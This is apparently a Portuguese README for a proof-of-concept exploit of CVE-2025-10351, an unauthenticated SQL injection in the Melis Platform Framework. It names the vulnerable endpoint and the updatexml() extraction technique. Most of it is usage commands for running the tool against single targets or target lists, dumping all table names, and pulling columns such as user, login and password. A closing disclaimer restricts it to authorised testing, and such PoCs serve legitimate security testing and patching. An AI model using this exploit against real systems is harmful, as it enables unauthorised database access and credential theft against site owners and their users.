
Exploit para CVE-2025-10351. Injeção de SQL no Melis Platform Framework.
POC para CVE-2025-10351: Uma vulnerabilidade de Injeção SQL não autenticada que afeta um endpoint específico no Melis Platform Framework.
Este POC tem como alvo uma vulnerabilidade de injeção SQL baseada em erro não autenticada no endpoint:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
Ele utiliza updatexml() no MySQL para extrair:
Também detecta possíveis vetores de SQLi baseado em tempo para exploração manual adicional.
Instale as dependências com:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
| Argument | Description |
|---|---|
-u | URL alvo |
-p | Porta (80, 443, etc.) |
-l | Arquivo contendo lista de URLs |
-s | Tempo de espera para testes baseados em tempo (padrão: 1s) |
-at | Extrair todos os nomes de tabelas |
-t | Especificar nome da tabela |
-ac | Extrair todas as colunas da tabela fornecida |
-c | Lista separada por vírgulas de colunas para extrair |
--proxy | Proxy Burp http://127.0.0.1:8080 |
--insecure | Desabilitar verificações TLS ao usar conexões de proxy |
--cookie | Cookies para requisições autenticadas |
--debug | Modo de depuração |
tables_extracted.txt<table_name>_data.txtEste documento é apenas para testes de segurança autorizados e remediação. Não use o PoC ou as etapas de reprodução contra sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não se responsabiliza pelo uso indevido.
Feito com ❤️ por Manuel Iván San Martín Castillo